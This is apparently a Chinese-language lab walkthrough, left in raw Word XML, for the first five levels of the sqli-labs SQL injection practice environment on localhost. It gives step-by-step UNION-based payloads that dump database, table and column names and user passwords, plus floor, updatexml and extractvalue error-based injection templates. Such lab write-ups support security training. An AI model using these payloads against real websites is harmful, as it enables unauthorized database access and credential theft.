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Lesson1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问lesson1页面我们可以看到：Please input the ID as parameter with numeric value</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>翻译过来就是：请输入id作为带数值的参数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面正式开始进入闯关过程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-- （这里有一个空格，--空格）在SQL内表示注释，但在URL中，如果在最后加上-- ，浏览器在发送请求的时候会把URL末尾的空格舍去，所以我们用--+代替-- ，原因是+在URL被URL编码后会变成空格。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">第一关 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.经过语句and 1=2测试 ，页面回显正常，所以该地方不是数值查询</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.接着尝试在id后面加上'，发现页面回显不正常，表示可能存在SQL字符注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.输入--+将sql后面的语句注视掉后，发现页面回显正常，则证明这个地方是单引号字符型注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.接着使用order by 语句判断，该表中一共有几列数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    order by 3页面回显正常，order by 4页面回显不正常，说明此表一个有3列。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5.将id=1改为一个数据库不存在的id值，如861，使用union select 1,2,3联合查询语句查看页面是否有显示位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发现页面先输出了2和3，说明页面有2个显示位</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6.然后利用sql查询语句依次爆破出数据库内的数据库名，表名，列名，字段信息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http://127.0.0.1/sqli-labs/Less-1/?id=861' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这是一个查询数据库名信息的语句</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询security内的所有表名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://127.0.0.1/sqli-labs/Less-1/?id=861' union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema='security')--+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接着使用下面的语句爆破出列名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>?id=861' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3 --+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接着使用如下语句查询所有的用户名，密码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>?id=861' union select 1,(select group_concat(username) from security.users),(select group_concat(password) from security.users)--+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Lesson2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面开始第二关的讲解</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进入Lesson2会发现和lesson1的提示是一样的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.首先输入?id=2，然后输入?id=2-1页面信息发生变化，说明此处是数值型注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.order by 3  页面显示正常，order by 4页面显示不正常，所以该表有3列数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接着可以使用联合查询进行注入，详细过程参考第一关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Lesson3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面开始第三关的讲解：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进入Lesson3会发现和lesson1的提示是一样的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.首先输入?id=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页面显示正常，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>向页面输入?id=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'  --+页面显示不正常，</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是输入  ?id=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') --+ 页面回显正常，说明此处是字符型注入,而且是以 ('')的方式闭合字符串的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.接着使用order by 判断表中有3列数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.接着使用联合查询，union select 1，2，3 判断页面是否有显示位   答案：有</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  下面使用第一关所使用的查询语句，测试一下，页面没有问题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下面开始第四关的讲解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进入Lesson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会发现和lesson1的提示是一样的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与第三关类似，第四关使用   ("")   的方式闭合字符串，然后可以优先使用联合查询注入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</w:rPr>
        <w:t>首先输入?id=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页面显示正常，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>当输入?id=3" --+时，页面显示不正常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2.当输入?id=3") --+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>时，页面回归正常显示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下面是第五关的通关讲解：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1.经错测试发现，当输入?id=3时页面显示正常，当输</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>入?id=486页面显示如下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说明页面没有显示位。无法使用联合查询注入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2.接着我们尝试在URL中输入  ?id=2' 页面出现错误语句如下：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页面出现SQL语句报错，在这里我们就可以使用一种新的注入方式：报错注入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首先介绍三种报错注入常用的语句：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(1). 通过floor报错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(select 1 from (select count(*),concat((payload),floor (rand(0)*2))x from information_schema.tables group by x)a)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其中payload为你要插入的SQL语句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需要注意的是该语句将 输出字符长度限制为64个字符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(2). 通过updatexml报错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updatexml(1,payload,1)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同样该语句对输出的字符长度也做了限制，其最长输出32位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并且该语句对payload的反悔类型也做了限制，只有在payload返回的不是xml格式才会生效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(3). 通过ExtractValue报错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extractvalue(1, payload)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输出字符有长度限制，最长32位。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payload即我们要输入的sql查询语句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3.在这里我们使用floor报错语句进行注入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?id=2' and (select 1 from (select count(*),concat(((select group_concat(schema_name) from information_schema.schemata)),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floor (rand(0)*2))x from information_schema.tables group by x)a) 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这里发现页面提示我输出信息超过一行，但我们已经使用了group_concat函数，说明这里数据库名组成的字符串长度超过了64位，所以我们需要放弃group_concat函数，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而使用limit 0,1来一个个输出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group_concat()函数的作用：将返回信息拼接成一行显示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0,1  表示输出第一个数据。   0表示输出的起始位置，1表示跨度为1（即输出几个数据，1表示输出一个，2就表示输出两个）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接着我们运用如下语句：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(select 1 from (select count(*),concat(((select schema_name from information_schema.schemata limit 0,1)),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floor (rand(0)*2))x from information_schema.tables group by x)a) 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需要注意的是，此时数据库名并不是 information_schema1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这个1是floor报错语句中输出的也一部分（无论输出什么结果，都会有这个1）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为了防止某些时候，我们误以为这个1也是我们查询结果的一部分，我建议大家使用一个；与它分开，语句如下：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?id=2' and (select 1 from (select count(*),concat(((select concat(schema_name,';') from information_schema.schemata limit 0,1)),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floor (rand(0)*2))x from information_schema.tables group by x)a) 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下面我们更该我们的payload一个个的查询我们要找的数据即可，这里不再演示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11A50"/>
    <w:rsid w:val="19AB42A3"/>
    <w:rsid w:val="2A3504EE"/>
    <w:rsid w:val="47A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2020-06-03T07:53:00Z</dcterms:created>
  <dc:creator>LSY</dc:creator>
  <cp:lastModifiedBy>核桃，加油↖(^ω^)↗</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-06-04T08:06:11Z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